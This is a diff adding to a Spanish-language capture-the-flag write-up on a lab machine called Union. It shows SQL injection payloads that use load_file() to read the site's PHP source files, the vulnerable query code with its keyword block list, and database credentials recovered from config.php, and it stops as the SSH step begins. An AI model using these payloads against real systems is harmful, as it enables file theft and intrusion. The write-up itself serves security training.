Data for Union hasta SSH

--- a/_posts/2022-01-09-Union2-SQLI.md
+++ b/_posts/2022-01-09-Union2-SQLI.md
@@ -113,16 +113,74 @@ Obtenemos la `Data` para la Columna `one` en la Tabla `flag` y en la Base de Dat
 Sorry, "UHC{F1rst_5tep_2_Qualify}" you are not eligible due to already qualifying.
 ```
 
-Encontramos la flag que nos piden 
+Encontramos la flag que nos piden la introducimos en la ruta `/challenge` y vemos que nos abren el el puerto SSH pero no tenemos ninguna usuario ni clave ni na de na para conectarnos.
+```bash
+Welcome Back!
+Your IP Address has now been granted SSH Access.
+```
 
+Procedemos a intentar listar informacion tipo `Local File Inclusion` atraves de la `SQLI` 
+```bash
+player=admin' union select load_file("/var/www/html/index.php")-- -
+```
 
+Vemos que listamos el codigo fuente del Archivo  `index.php`
 
+```bash
+Sorry, <?php
+  require('config.php');
+  if ( $_SERVER['REQUEST_METHOD'] == 'POST' ) {
 
+	$player = strtolower($_POST['player']);
 
+	// SQLMap Killer
+	$badwords = ["/sleep/i", "/0x/i", "/\*\*/", "/-- [a-z0-9]{4}/i", "/ifnull/i", "/ or /i"];
+	foreach ($badwords as $badword) {
+		if (preg_match( $badword, $player )) {
+			echo 'Congratulations ' . $player . ' you may compete in this tournament!';
+			die();
+		}
+	}
 
+	$sql = "SELECT player FROM players WHERE player = '" . $player . "';";
+	$result = mysqli_query($conn, $sql);
+	$row = mysqli_fetch_array( $result, MYSQLI_ASSOC);
+	if ($row) {
+		echo 'Sorry, ' . $row['player'] . " you are not eligible due to already qualifying.";
+	} else {
+		echo 'Congratulations ' . $player . ' you may compete in this tournament!';
+		echo '<br />';
+		echo '<br />';
+		echo 'Complete the challenge <a href="/challenge.php">here</a>';
+	}
+	exit;
+  }
+?>
+```
 
+Procedemos a listar informacion del archivo `config.php`
 
+```bash
+player=admin' union select load_file("/var/www/html/config.php")-- -
+```
+Respuesta de la inyeccion SQL `load_file()`
 
+```bash
+Sorry, <?php
+  session_start();
+  $servername = "127.0.0.1";
+  $username = "uhc";
+  $password = "uhc-11qual-global-pw";
+  $dbname = "november";
+
+  $conn = new mysqli($servername, $username, $password, $dbname);
+?>
+ you are not eligible due to already qualifying.
+```
+
+Ya tenemos credenciales para conectarnos por SSH como `uhc` a la maquina.
+
+Procedemos a conectarnos por SSH
 
 
 
